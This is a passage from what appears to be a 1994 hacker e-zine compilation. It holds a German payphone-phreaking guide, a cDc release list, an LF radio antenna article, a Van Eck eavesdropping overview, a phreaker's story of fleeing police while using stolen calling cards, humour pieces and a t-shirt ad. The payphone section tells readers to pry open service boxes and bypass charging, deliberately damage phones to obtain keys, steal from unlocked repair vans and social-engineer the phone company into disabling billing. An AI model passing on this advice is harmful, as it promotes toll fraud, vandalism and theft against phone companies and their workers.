  2252. and let it sit there for a while, you will have to release it a
  2253. bit every 5 seconds or so, or the phone will reset anyway. If you
  2254. receive a call while doing this, a buzz will appear on the line.
  2255.  
  2256.   Upon that buzz, let the lever go and you'll be connected, and
  2257. the cuckoo tone will be shut up! So if you want to receive a collect
  2258. call, this is how you do it. Tell the operator you accept the charges,
  2259. and talk away. You can use this method overseas, too: Just tell your
  2260. buddy in the states to call Germany Direct (800-292-0049) and make
  2261. a collect call to you waiting in the payphone, and you save a cool
  2262. $1.17 a minute doing that. So much for the kids that just want to
  2263. have some cheap fun, and on with the rest.
  2264.  
  2265.   Wasting so much time in that rotten payphone, you probably
  2266. noticed the little black box beneath the phone. During my, erm,
  2267. research I found out that this box contains some fuses, a standard
  2268. Euro 220V power connector, and a TAE-F standard phone connector.
  2269. Completing the fun is the fact that it's extremely easy to pry it
  2270. open. The TAE-F plug is also bypassing the phone and the charge
  2271. collection circuits, so you can just use it like your jack at home.
  2272. Bring a crowbar and your laptop, or your Pentium tower, power it over
  2273. the payphone and plug your Dual into the jack. This way you can even
  2274. run a board from a payphone, and people can download the latest
  2275. WaReZzzZzz right from the booth. It's preferable to obtain a key for
  2276. the lock of the box, just do some malicious damage to it (yes, let
  2277. the animal take control), and call Telekom Repairs at 1171 and they
  2278. will come and fix it. Since they always leave their cars unlocked,
  2279. or at least for the ones I ran across, you can either take the whole
  2280. car or all their k-rad equipment, manuals, keys, and even their lunch
  2281. box. But we're shooting off topic here. The keys are usually general
  2282. keys, means they fit on all payphones in your area. There should also
  2283. be a nationwide master key, but the German Minister of Tele-
  2284. communications is probably keeping that one in his desk drawer.
  2285.  
  2286.   The chargecards for the card-op ones appear to have a little chip
  2287. on them, where each charge unit is being deducted, and since no-one
  2288. could figure out how it works, or how to refill the cards or make a
  2289. fake one, but a lot of German phreaks are busy trying to figure that
  2290. out.
  2291.  
  2292.   A good approach is also social-engineering Telekom so they turn
  2293. off the charge deduction signal (which doesn't mean the call are free,
  2294. but the buzz is just not transmitted any more) so the phone doesn't
  2295. receive a signal to charge you any money no matter where you call.
  2296. The problem with this method is that the world will spread in the
  2297. neighborhood that there is a payphone where you can call for free,
  2298. and therefore it will be so crowded that you can't use it, and
  2299. the phone pals will catch up fast. It's fun though, I tried it, and
  2300. I still get free drinks at the local pub for doing it.
  2301.  
  2302.   Another k-rad feature on them is the built-in modem that they use
  2303. to get their software. On a fatal error condition they appear to dial
  2304. a telecom number and download the latest software just how their ROM
  2305. commands them to do. We will shortly take a phone, install it some-
  2306. where else and figure out where it calls, what the protocol is and
  2307. what else is being transmitted, but that will probably be in another
  2308. Phrack.
  2309.  
  2310.   If you found out anything that might be of interest, you are
  2311. welcome to mail it to onkeld@ponton.hanse.de using the public key
  2312. beneath. Unencrypted mail will be killed since ponton.hanse.de is
  2313. run by a paranoid bitch that reads all traffic just for the hell
  2314. of it, and I don't want the phedzZz to come and beat me over the
  2315. head with a frozen chunk o' meat or worse.
  2316.  
  2317.   Stay alert, watch out and have fun...
  2318.  
  2319. -----BEGIN PGP PUBLIC KEY BLOCK-----
  2320. Version: 2.3a
  2321.  
  2322. mQCNAize9DEAAAEEAKOb5ebKYg6cAxaiVT/H5JhCqgNNDHpkBwFMNuQW2nGnLMvg
  2323. Q0woIxrM5ltnnuCBJGrGNskt3IMXsav6+YFjG6IA8YRHgvWEwYrTeW2tniS7/dXY
  2324. fqCCSzTxJ9TtLAiMDBgJFzOIUj3025zp7rVvKThqRghLx4cRDVBISel/bMSZAAUR
  2325. tChPbmtlbCBEaXR0bWV5ZXIgPG9ua2VsZEBwb250b24uaGFuc2UuZGU+
  2326. =b5ar
  2327. -----END PGP PUBLIC KEY BLOCK-----
  2328. ------------------------------------------------------------------------------
  2329.  
  2330.       _   _                                                          _   _
  2331.      ((___))                INFORMATION IS JUNK MAIL                ((___))
  2332.      [ x x ]                                                        [ x x ]
  2333.       \   /                    cDc communications                    \   /
  2334.       (' ')             -cDc- CULT OF THE DEAD COW -cDc-             (' ')
  2335.        (U)                                                            (U)
  2336.   deal with it,        presents unto you 10 phat t-files,        deal with it,
  2337.    S U C K E R                fresh for July 1994:                S U C K E R
  2338.  
  2339.     New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:
  2340.  
  2341.  _________________________________/Text Files\_________________________________
  2342.  
  2343. 261: "Interview with Greta Shred" by Reid Fleming.  Reid conducts an in-depth
  2344. interview with the editor of the popular 'zine, _Mudflap_.
  2345.  
  2346. 262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile.  Paper
  2347. presented for the 1993 National Popular Culture Association meeting in New
  2348. Orleans.
  2349.  
  2350. 263: "What Color Is the Sky in Your World?" by Tequila Willy.  Here's your
  2351. homework, done right for you by T. "Super-Brain" Willy.
  2352.  
  2353. 264: "Chicken Hawk" by Mark E. Dassad.  Oh boy.  Here's a new watermark low
  2354. level of depravity and sickness.  If you don't know what a "chicken hawk" is
  2355. already, read the story and then you'll understand.
  2356.  
  2357. 265: "Eye-r0N-EE" by Swamp Ratte'.  This one's interesting 'cause only about
  2358. half-a-dozen or so lines in it are original.  The rest was entirely stuck
  2359. together from misc. files on my hard drive at the time.  Some art guy could say
  2360. it's a buncha post-this&that, eh?  Yep.
  2361.  
  2362. 266: "Interview with Barbie" by Clench.  Barbie's got her guard up.  Clench
  2363. goes after her with his rope-a-dope interview style.  Rope-a-dope, rope-a-dope.
  2364. This is a boxing reference to a technique mastered by The Greatest of All Time,
  2365. Muhamed Ali.
  2366.  
  2367. 267: "About a Boy" by Franken Gibe.  Mr. Gibe ponders a stolen photograph.
  2368. Tiny bunnies run about, unhindered, to find their own fate.
  2369.  
  2370. 268: "Mall Death" by Snarfblat.  Story about a Dumb Girl[TM].  Are you
  2371. surprised?
  2372.  
  2373. 269: "Prophile: Future History" by THE NIGHTSTALKER.  It's the future, things
  2374. are different, but the Master Hacker Dude lives on.
  2375.  
  2376. 270: "Time out for Pop" by Malcolm D. Moore.  Sad account of a hopless-pop.
  2377.  
  2378.  __________________________________/cDc Gnuz\__________________________________
  2379.  
  2380.      "And that no man might buy or sell, save he that had the mark, or the name
  2381. of the Cow, or the number of his name.  Here is wisdom.  Let him that hath
  2382. understanding count the number of the Cow: for it is the number of a man; and
  2383. his number is eight billion threescore and seven million nine hundred fourty-
  2384. four thousand three hundred threescore and two.  So it is written."  -Omega
  2385.  
  2386.  
  2387. Yowsah, yowsah, yowsah.  JULY once again, the super-hooray month which marks
  2388. cDc's 8th year of existence.  Outlasting everyone to completely rule and
  2389. dominate all of cyberspace, blah blah blah.  Yeah, think a special thought
  2390. about cDc's significance in YOUR life the next time you go potty.  Name your
  2391. firstborn child after me, and we'll call it karmicly even, pal.  My name is
  2392. Leroy.
  2393.  
  2394.  
  2395. We're always taking t-file submissions, so if you've got a file and want to
  2396. really get it out there, there's no better way than with cDc.  Upload text to
  2397. The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
  2398. office box in Lubbock, TX.  No song lyrics and bad poetry please; we'll leave
  2399. that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.
  2400.  
  2401.  
  2402. News item of the month, as found by Count Zero:
  2403.  
  2404. "ROTTING PIG FOUND IN DITCH
  2405.  
  2406. VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill
  2407. McVey found a rotting pig in a ditch two miles north of town.  Farmer McVey
  2408. reported the pig to the authorities, because you cannot, legally, just leave a
  2409. dead pig in a ditch.  You must dispose of your deceased livestock properly.
  2410. There are companies that will take care of this for you.  As for proper
  2411. disposal of large dead animals, McVey contracts with Used Cow Dealer."
  2412.  
  2413.                                       "...and the rivers ran red with the bl00d
  2414.                                             of the Damned and the Deleted..."
  2415.                                                         -Dem0nSeed
  2416.  
  2417. S. Ratte'
  2418. cDc/Editor and P|-|Ear13zz |_3@DeRrr
  2419. "We're into t-files for the groupies and money."
  2420. Middle finger for all.
  2421.  
  2422. Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
  2423. Internet: sratte@phantom.com.
  2424. ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.
  2425.  _____________________________________________________________________________
  2426.  
  2427.   cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
  2428.   Copyright (c) 1994 cDc communications.  All Rights Reserved.
  2429.  
  2430. ------------------------------------------------------------------------------
  2431.  
  2432. ===[ Radio Modification Project ]===========================================>
  2433.  
  2434.         Tuning in to Lower Frequency Signals              June 26, 1994
  2435.  
  2436. ====================================================[ By: Grendel / 905 ]===>
  2437.  
  2438.           The lower frequency regions of the radio spectrum are often
  2439.         ignored  by ham'ers, pirates, and DX'ers alike due to the
  2440.         relatively little known ways of tuning in. The following article
  2441.         will detail how to construct a simple-made antenna to tune in
  2442.         to the LF's and show how to adjust an amateur band type radio
  2443.         to receive the desired signals.
  2444.  
  2445.        ___________
  2446.        \         /
  2447.         \/:    \/
  2448.         / .     \
  2449.         \_______/he lower frequency spectrum has been made to include
  2450.         the  very low  frequency  ("VLF" 2 kHz to 30 kHz)  band and a
  2451.         small part of the medium frequency ("MF" 300 - 500 kHz) band.
  2452.           For our purposes, a suitable receiver must be able to cover
  2453.         the 2 kHz to 500 kHz  range as well as being calibrated at 10
  2454.         kHz intervals (standard). The receiver must also be capable of
  2455.         covering AM and CW broadcasts. For best capabilities, the
  2456.         receiver  should also be able to  cover LSB ("lower side band")
  2457.         and USB ("upper side band").
  2458.  
  2459.         The Receiving System
  2460.         `'`'`'`'`'`'`'`'`'`'
  2461.           The receiver I use consists of a standard amateur HF ("High
  2462.         Frequency") band receiver adjusted between the 3,500 and 4,000
  2463.         kHz bands.  This causes the  receiver to act as a tuneable IF
  2464.         ("Intermediate Frequency") and also as demodulator.  You will
  2465.         also require a wideband LF ("Low Frequency") converter  which
  2466.         includes a 3,500 kHz crystal oscillator. See Fig. 1:
  2467.  
  2468.            .==[ Fig 1. Block Diagram ]============================.
  2469.            |  _____                                               |
  2470.            |  \ANT/                                               |
  2471.            |   \./        crystal                                 |
  2472.            |    |      ______|______       ____________           |
  2473.            |    `-----| 2 - 500 kHz |     | 3-4000 kHz |          |
  2474.            |          |  Converter* |--~--| IF Receiver|---OUTPUT |
  2475.            |    .-----|_____________|     |____________|          |
  2476.            |    |                                                 |
  2477.            |   GND                                                |
  2478.            |______________________________________________________|
  2479.  
  2480.              *The converter is a circuit board type 80D/L-101/PCB
  2481.               available from L.F. Engineering Co, 17 Jeffry Road,
  2482.               East Haven CT, 06513 for $43 US including S & H.One
  2483.               may be  constructed to work with your receiver (but
  2484.               at a higher price no doubt).
  2485.  
  2486.           Phono jack plugs and sockets are  used for the interconnections
  2487.         throughout the receiving  system and the  converter and
  2488.         receiver (~) are connected with RG58 coax cable of no greater
  2489.         length than 4 ft.
  2490.           When tuning, the station  frequency is measured by deducting
  2491.         3,500 kHz from the scale on the main  receiver (ie. 340 kHz =
  2492.         3,840 kHz on  the main  receiver, 120 = 3,620 kHz, 95 = 3,595
  2493.         kHz, etc.)
  2494.  
  2495.         The Ferrite End-fed Antenna
  2496.         `'`'`'`'`'`'`'`'`'`'`'`'`'`
  2497.           This is a small antenna designed to tune between 95 kHz and
  2498.         500 kHz. It consists of a coil wound around a ferrite rod, with
  2499.         a 4 ft. lead.
  2500.  
  2501.                 Materials:
  2502.                   o  7 7/8" x 3/8" ferrite rod
  2503.                   o  5" 24 SWG double cotton covered copper wire
  2504.                   o  2 PLASTIC coated terry clips
  2505.                   o  a wood or plastic base (8 1/2" x .8" x .5")
  2506.                   o  2 standard, two-gang 500 pF tuning capacitors
  2507.                   o  a plastic plate (preferably 2" high)
  2508.  
  2509. ------------------------------------------------------------------------------
  2510.  
  2511.  -- A Few Things on Van Eck's Method of Eavesdroping --
  2512.   Opticon the Disassembled - UPi
  2513.  
  2514.  Dr Wim Van Eck, was the  one who  developed the  anonymous method for
  2515. eavesdroping  computers  ( and, apparently, not  only ) from  distance,
  2516. in  the  laboratories of  Neher, Holland. This  method is  based on the
  2517. fact that monitors do transmit electromagnetic radiations. As a device,
  2518. it is not too  complex  and it can be  constructed from an  experienced
  2519. electronics  phreak. It  uses a simple-direction  antenna  which  grabs
  2520. monitor  signals from  about 800 meters away. Simplified schematics are
  2521. available from Consumertronics.
  2522.  
  2523.  TEMPEST stands for Transient  ElectroMagnetic  Pulse Emanation STandard.
  2524. It concerns the quantity of  electromagnetic radiations from monitors and
  2525. televisions, although  they  can also  be  detected on  keyboards, wires,
  2526. printers and central units. There are some  security levels in which such
  2527. radiations are  supposed  to be  untraceable by  Van  Eck  systems. Those
  2528. security  levels or  standards, are  described  thoroughly in a technical
  2529. exposition  called  NACSIM  5100A, which  has been  characterized by  NSA
  2530. classified.
  2531.  
  2532.  Variations of the  voltage of the electrical current, cause electromagnetic
  2533. pulses in the form of  radio waves. In cathode ray  tube ( C.R.T. ) devices,
  2534. such as  televisions and monitors, a source of  electrons scans the internal
  2535. surface and activates  phosphore. Whether or not the scanning is interlaced or
  2536. non-interlaced, most  monitors  transmit  frequencies  varying from 50 to 75
  2537. Mhz per second. They also  transmit harmonic  frequencies, multiplies of the
  2538. basic frequencies; for example a transmitter with signal of 10 Mhz per second
  2539. will  also  transmit  waves of 20, 30, 40 etc. Mhz. Those  signals are
  2540. weaker  because the  transmiter itself  effaces them. Such variations in the
  2541. voltage is what the Van Eck system receives and analyzes.
  2542.  
  2543.  There are ways to prevent or make it harder for someone to monitor
  2544. your  monitor. Obviously  you cannot  place your  computer system
  2545. underground and cover it with a  Faraday cage or a  copper shield
  2546. ( If your case is  already that, then you know more about Van Eck
  2547. than I do ). What else ?
  2548.  
  2549.  (1) Certain computers, such as Wang's, prevent such divulges;
  2550.  give preference to them.
  2551.  
  2552.  (2) Place your monitor into a grounded metal box, 1.5 cm thick.
  2553.  
  2554.  (3) Trace your tracer(s). They gonna panic.
  2555.  
  2556.  (4) Increase of the  brightness and  lowering of the contrast
  2557.  reduces TEMPEST's power. Metal objects, like bookshelves,
  2558.  around the room, will also help a little bit.
  2559.  
  2560.  (5) Make sure that two or more monitors are transmitting at the same
  2561.  frequency and let them operate simultaneously; this will confuse
  2562.  Van Eck systems.
  2563.  
  2564.  (6) Buy or make on your own, a device which will transmit noise
  2565.  at your monitor's frequency.
  2566.  
  2567.  (7) Act naturally. That is:
  2568.  
  2569.  (a) Call IRC, join #hack and never mumble a single word.
  2570.  
  2571.  (b) Read only best selling books.
  2572.  
  2573.  (c) Watch television at least 8 hours a day.
  2574.  
  2575.  (d) Forget altruism; there is only you, yourself
  2576.      and your dick/crack.
  2577.  
  2578.  (8) Turn the monitor off.
  2579.  
  2580. ------------------------------------------------------------------------------
  2581.  
  2582.                         -Almost Busted-
  2583.                          By: Deathstar
  2584.  
  2585.         It all started one week in the last month of summer.  Only my brother
  2586. and I were at the house for the whole week, so I did whatever I wanted.
  2587. Every night, I would phreak all night long.  I would be either at a payphone
  2588. using AT&Tz, or at home sitting on a conference.  I would be on the phone
  2589. till at least four or five in the morning.  But one night, my luck was running
  2590. thin, and I almost phreaked for the last time.  I was at a payphone, using
  2591. cards.  I had been there since around twelve midnight..  The payphone was
  2592. in a shopping center with a supermarket and a few other stores.  Most every
  2593. thing closed at eleven.. Except for the nearby gas station.  Anyway, I was
  2594. on the phone with only one person that night.  I knew the card would be dead
  2595. by the end of the night so I went ahead and called him on both of his lines
  2596. with both of the payphones in the complex with the same card.  I had talked
  2597. for hours.  It started to get misty and hard to see.  Then, I noticed a car
  2598. of some kind pulling into the parking lot.  I couldn't tell what kind of
  2599. car it was, because it was so dark.  The car started pulling up to me, and
  2600. when it was around twenty feet away I realized it was a police car.  They
  2601. got on the loudspeaker and yelled "Stay where you are!".  I dropped the
  2602. phone and ran like hell past the supermarket to the edge of the complex.
  2603. I went down a bike path into a neighborhood of townhouses.  Running across
  2604. the grass, I slipped and fell about two or three times.  I knew they were
  2605. following me, so I had to hide.  I ran to the area around the back of
  2606. the supermarket into a forest.  I smacked right into a fence and fell
  2607. on the ground.  I did not see the fence since it was so dark.  Crawling a
  2608. few feet, I laid down and tried to cover my body with some leaves and
  2609. dirt to hide.  I was wearing an orange shirt and white shorts.  I laid
  2610. as still as I could, covered in dirt and leaves.  I could hear the police
  2611. nearby.  They had flashlights and were walking through the forest looking
  2612. for me.  I knew I would get busted.  I tried as hard as I could to keep
  2613. from shaking in fear.  I lay there for around thirty minutes.  Bugs were
  2614. crawling around on my legs biting me.  I was itching all over.  I couldn't
  2615. give up though, because if they caught me I knew that would be the end
  2616. of my phreaking career.  I was trying to check if they were still looking
  2617. for me, because I could not hear them.  Just as I was about to make a run
  2618. for it, thinking they were gone I heard a police radio.  I sat tight again.
  2619. For another hour, I lay there until finally I was sure they were gone.  I
  2620. got up and started to run.  I made my way through the neighborhood to my
  2621. house.  Finally I got home.  It was around five thirty a.m.  I was filthy.
  2622. The first thing I did was call the person I was talking to on the payphone
  2623. and tell him what happened.  Then, I changed clothes and cleaned myself up.
  2624. I checked my vmb to find that a conference was up.  I called it, and told
  2625. my story to everyone on.
  2626.  
  2627.  I thought that was the end of my confrontation with the police, but I
  2628. was wrong.  The next day I had some people over at my house.  Two or Three
  2629. good friends.  One of them said that there was a fugitive loose in our
  2630. town.  We were bored so we went out in the neighborhood to walk around
  2631. and waste time.  Hardly anyone was outside, and police cars were going
  2632. around everywhere.  One guy did leave his house but he brought a baseball
  2633. bat with him.  We thought it was funny.  Anyway, we soon got bored and
  2634. went back home.  Watching tv, we turned to the news.  They had a Report
  2635. about the Fugitive.  We watched.  It showed a picture of the shopping
  2636. center I was at.  They said "One suspect was spotted at this shopping
  2637. center last night at around four thirty in the morning.  The officer
  2638. is around ninety five percent sure that the suspect was the fugitive.
  2639. He was wearing a orange shirt and white shorts, and ran when approached."
  2640. I then freaked out.  They were searching my neighborhood for a fugitive
  2641. that didn't exist!  I called back the guy I was talking to the night
  2642. before and told him, and then told everyone that was on the conference
  2643. the night before.  It ended up that the fugitives never even entered
  2644. our state.  They were caught a week later around thirty miles from
  2645. the prison they escaped from.  Now I am known by two nicknames. "NatureBoy"
  2646. because everyone says I communed with nature for a hour and a half hiding
  2647. from the police, and "The Fugitive" for obvious reasons.  Anywayz, That's
  2648. how I was almost busted..
  2649.  
  2650. -DS
  2651.  
  2652. ------------------------------------------------------------------------------
  2653.  
  2654. The following is a *true* story.  It amused the hell out of me while it
  2655. was happening.  I hope it isn't one of those "had to be there" things.
  2656. Copyright 1994 Captain Sarcastic, all rights reserved.
  2657.  
  2658. On my way home from the second job I've taken for the extra holiday ca$h I
  2659. need, I stopped at Taco Bell for a quick bite to eat.  In my billfold is
  2660. a $50 bill and a $2 bill.  That is all of the cash I have on my person.
  2661. I figure that with a $2 bill, I can get something to eat and not have to
  2662. worry about people getting pissed at me.
  2663.  
  2664. ME:  "Hi, I'd like one seven layer burrito please, to go."
  2665. IT:  "Is that it?"
  2666. ME:  "Yep."
  2667. IT:  "That'll be $1.04, eat here?"
  2668. ME:  "No, it's *to* *go*."  [I hate effort duplication.]
  2669.  
  2670. At his point I open my billfold and hand him the $2 bill.  He looks at it
  2671. kind of funny and
  2672.  
  2673. IT:  "Uh, hang on a sec, I'll be right back."
  2674.  
  2675. He goes to talk to his manager, who is still within earshot.  The
  2676. following conversation occurs between the two of them.
  2677.  
  2678. IT:  "Hey, you ever see a $2 bill?"
  2679. MG:  "No.  A what?"
  2680. IT:  "A $2 bill.  This guy just gave it to me."
  2681. MG:  "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp]
  2682. IT:  "Yeah, thought so."
  2683.  
  2684. He comes back to me and says
  2685.  
  2686. IT:  "We don't take these.  Do you have anything else?"
  2687. ME:  "Just this fifty.  You don't take $2 bills?  Why?"
  2688. IT:  "I don't know."
  2689. ME:  "See here where it says legal tender?"
  2690. IT:  "Yeah."
  2691. ME:  "So, shouldn't you take it?"
  2692. IT:  "Well, hang on a sec."
  2693.  
  2694. He goes back to his manager who is watching me like I'm going to
  2695. shoplift, and
  2696.  
  2697. IT:  "He says I have to take it."
  2698. MG:  "Doesn't he have anything else?"
  2699. IT:  "Yeah, a fifty.  I'll get it and you can open the safe and get change."
  2700. MG:  "I'M NOT OPENING THE SAFE WITH HIM IN HERE."  [my emp]
  2701. IT:  "What should I do?"
  2702. MG:  "Tell him to come back later when he has REAL money."
  2703. IT:  "I can't tell him that, you tell him."
  2704. MG:  "Just tell him."
  2705. IT:  "No way, this is weird, I'm going in back."
  2706.  
  2707. The manager approaches me and says
  2708.  
  2709. MG:  "Sorry, we don't take big bills this time of night."  [it was 8pm and
  2710.       this particular Taco Bell is in a well lighted indoor mall with 100
  2711.       other stores.]
  2712. ME:  "Well, here's a two."
  2713. MG:  "We don't take *those* either."
  2714. ME:  "Why the hell not?"
  2715. MG:  "I think you *know* why."
  2716. ME:  "No really, tell me, why?"
  2717. MG:  "Please leave before I call mall security."
  2718. ME:  "Excuse me?"
  2719. MG:  "Please leave before I call mall security."
  2720. ME:  "What the hell for?"
  2721. MG:  "Please, sir."
  2722. ME:  "Uh, go ahead, call them."
  2723. MG:  "Would you please just leave?"
  2724. ME:  "No."
  2725. MG:  "Fine, have it your way then."
  2726. ME:  "No, that's Burger King, isn't it?"
  2727.  
  2728. At this point he BACKS away from me and calls mall security on the phone
  2729. around the corner.  I have two people STARING at me from the dining area,
  2730. and I begin laughing out loud, just for effect.  A few minutes later this
  2731. 45 year oldish guy comes in and says [at the other end of counter, in a
  2732. whisper]
  2733.  
  2734. SG:  "Yeah, Mike, what's up?"
  2735. MG:  "This guy is trying to give me some [pause] funny money."
  2736. SG:  "Really?  What?"
  2737. MG:  "Get this, a *two* dollar bill."
  2738. SG:  "Why would a guy fake a $2 bill?"  [incredulous]
  2739. MG:  "I don't know?  He's kinda weird.  Says the only other thing he has is
  2740.       a fifty."
  2741. SG:  "So, the fifty's fake?"
  2742. MG:  "NO, the $2 is."
  2743. SG:  "Why would he fake a $2 bill?"
  2744. MG:  "I don't know.  Can you talk to him, and get him out of here?"
  2745. SG:  "Yeah..."
  2746.  
  2747. Security guard walks over to me and says
  2748.  
  2749. SG:  "Mike here tells me you have some fake bills you're trying to use."
  2750. ME:  "Uh, no."
  2751. SG:  "Lemme see 'em."
  2752. ME:  "Why?"
  2753. SG:  "Do you want me to get the cops in here?"
  2754.  
  2755. At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
  2756. I said
  2757.  
  2758. ME:  "I'm just trying to buy a burrito and pay for it with this $2 bill."
  2759.  
  2760. I put the bill up near his face, and he flinches like I was taking a
  2761. swing at him.  He takes the bill, turns it over a few times in his hands,
  2762. and says
  2763.  
  2764. SG:  "Mike, what's wrong with this bill?"
  2765. MG:  "It's fake."
  2766. SG:  "It doesn't look fake to me."
  2767. MG:  "But it's a **$2** bill."
  2768. SG:  "Yeah?"
  2769. MG:  "Well, there's no such thing, is there?"
  2770.  
  2771. The security guard and I both looked at him like he was an idiot, and it
  2772. dawned on the guy that he had no clue.
  2773.  
  2774. My burrito was free and he threw in a small drink and those cinnamon
  2775. things, too.  Makes me want to get a whole stack of $2 bills just to see
  2776. what happens when I try to buy stuff.  If I got the right group of
  2777. people, I could probably end up in jail.  At least you get free food.
  2778.  
  2779. ------------------------------------------------------------------------------
  2780.                          ==Phrack Magazine==
  2781.  
  2782.               Volume Five, Issue Forty-Six, File 4 of 28
  2783.  
  2784.  
  2785.                            //   //  /\   //   ====
  2786.                           //   //  //\\ //   ====
  2787.                          ==== //  //  \\/   ====
  2788.  
  2789.                      /\   //  // \\    //  /===   ====
  2790.                     //\\ //  //   //  //   \=\   ====
  2791.                    //  \\/    \\ //  //   ===/  ====
  2792.  
  2793.                                  PART II
  2794.  
  2795. ------------------------------------------------------------------------------
  2796.  
  2797. The official Legion of Doom t-shirts are still available.
  2798. Join the net.luminaries world-wide in owning one of
  2799. these amazing shirts.  Impress members of the opposite sex, increase
  2800. your IQ, annoy system administrators, get raided by the government and
  2801. lose your wardrobe!
  2802.  
  2803. Can a t-shirt really do all this?  Of course it can!
  2804.  
  2805. --------------------------------------------------------------------------
  2806.  
  2807. "THE HACKER WAR  --  LOD vs MOD"
  2808.  
  2809. This t-shirt chronicles the infamous "Hacker War" between rival
  2810. groups The Legion of Doom and  The Masters of Destruction.  The front
  2811. of the shirt displays a flight map of the various battle-sites
  2812. hit by MOD and tracked by LOD.  The back of the shirt
  2813. has a detailed timeline of the key dates in the conflict, and
  2814. a rather ironic quote from an MOD member.
  2815.  
  2816. (For a limited time, the original is back!)
  2817.  
  2818. "LEGION OF DOOM  --  INTERNET WORLD TOUR"
  2819.  
  2820. The front of this classic shirt displays "Legion of Doom Internet World
  2821. Tour" as well as a sword and telephone intersecting the planet
  2822. earth, skull-and-crossbones style.  The back displays the
  2823. words "Hacking for Jesus" as well as a substantial list of "tour-stops"
  2824. (internet sites) and a quote from Aleister Crowley.
  2825.  
  2826. --------------------------------------------------------------------------
  2827.  
  2828. All t-shirts are sized XL, and are 100% cotton.
  2829.  
  2830. Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
  2831. postage.
  2832.  
  2833. Send checks or money orders.  Please, no credit cards, even if
  2834. it's really your card.
  2835.  
  2836.  
  2837. Name:       __________________________________________________
  2838.  
  2839. Address:    __________________________________________________
  2840.  
  2841. City, State, Zip:   __________________________________________
  2842.  
  2843.  
  2844. I want ____ "Hacker War" shirt(s)
  2845.  
  2846. I want ____ "Internet World Tour" shirt(s)
  2847.  
  2848. Enclosed is $______ for the total cost.
  2849.  
  2850.  
  2851. Mail to:   Chris Goggans
  2852.            603 W. 13th #1A-278
  2853.            Austin, TX 78701
  2854.  
  2855.  
  2856. These T-shirts are sold only as a novelty items, and are in no way
  2857. attempting to glorify computer crime.
  2858.  
  2859. ------------------------------------------------------------------------------
  2860.  
  2861.                               introducing...
  2862.  
  2863.                     The PHRACK Horoscope, Summer 1994
  2864.  
  2865.   Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer
  2866.  
  2867.                                  ---
  2868.  
  2869.   Do you believe in the stars? Many do, some don't. In fact, the stars
  2870. can tell you a whole lot about the future. That's bullshit? You don't
  2871. believe it? Good. Be doomed. See you in hell. Here's the official PHRACK
  2872. horoscope for all eleet hackerz for the summer of 1994.
  2873.  
  2874.   You can use this chart to find out your zodiac sign by your DOB.
  2875.  
  2876.      Aquarius.....01/20 - 02/18       Leo..........07/23 - 08/22
  2877.      Pisces.......02/19 - 03/20       Virgo........08/23 - 09/22
  2878.      Aries........03/21 - 04/19       Libra........09/23 - 10/22
  2879.      Taurus.......04/20 - 05/20       Scorpio......10/23 - 11/21
  2880.      Gemini.......05/21 - 06/20       Sagittarius..11/22 - 12/21
  2881.      Cancer.......06/21 - 07/22       Capricorn....12/22 - 01/19
  2882.  
  2883.                                  ---
  2884.  
  2885.                oOo This summer's best combinations oOo
  2886.  
  2887.     YOU                   LOVE           BS VICTIM     H0T WAREZ
  2888.     ==============================================================
  2889.     Aquarius              Libra          Leo           Sagittarius
  2890.     Pisces                Sagittarius    Aquarius      Cancer
  2891.     Aries                 Aries          Cancer        Capricorn
  2892.     Taurus                Gemini         Pisces        Taurus
  2893.     Gemini                Cancer         Aries         Scorpio
  2894.     Cancer                Leo            Virgo         Gemini
  2895.     Leo                   Scorpio        Gemini        Leo
  2896.     Virgo                 Capricorn      Sagittarius   Libra
  2897.     Libra                 Virgo          Libra         Virgo
  2898.     Scorpio               Pisces         Capricorn     Pisces
  2899.     Sagittarius           Aquarius       Scorpio       Aquarius
  2900.     Capricorn             Taurus         Taurus        Aries
  2901.     ==============================================================
  2902.  
  2903.                                  ---
  2904.  
  2905.    And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!
  2906.  
  2907.    Aries [March 21st - April 19th]
  2908.  
  2909.  There is a pot full of k0DeZ at the end of the rainbow for you.
  2910.  Try to channel all your ambition on finding it, hint: you won't
  2911.  find it in /bin/gif/kitchen.gear.
  2912.  Warning: Risk of bust between August 5th and August 10th!
  2913.  Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]
  2914.  
  2915.    Taurus [April 20th - May 20th]
  2916.  
  2917.  PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
  2918.  Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake
  2919.  any interstellar space travel, and avoid big yellow ships.
  2920.  Watch out for SprintNet Security between July 12th and August 1st.
  2921.  Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]
  2922.  
  2923.    Gemini [May 21st - June 20th]
  2924.  
  2925.  There might be a force dragging you into warez boards. Try to resist
  2926.  the attraction, or you might be thrown out of the paradise.
  2927.  Hint: If a stranger with a /ASL connect crosses your way, stay away
  2928.  from him.
  2929.  Warning: Your Dual Standard HST might explode sometime in June.
  2930.  Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
  2931.  
  2932.    Cancer [June 21st - July 22nd]
  2933.  
  2934.  There are dark forces on your trail. Try to avoid all people wearing
  2935.  suits, don't get in their cars, and don't let them give you shit.
  2936.  Hint: Leave the country as soon if you can, or you won't be able to.
  2937.  Look out for U4EA on IRC in late July, you might get /killed.
  2938.  Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]
  2939.  
  2940.    Leo [July 23rd - August 22nd]
  2941.  
  2942.  The path of Venus this year tells us that there is love on the way
  2943.  for you. Don't look for it on X-rated ftp sites, it might be out there
  2944.  somewhere. Hint: Try getting out of the house more frequently or you
  2945.  might miss it.
  2946.  Warning: If Monica Weaver comes across your way, break and run!
  2947.  Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]
  2948.  
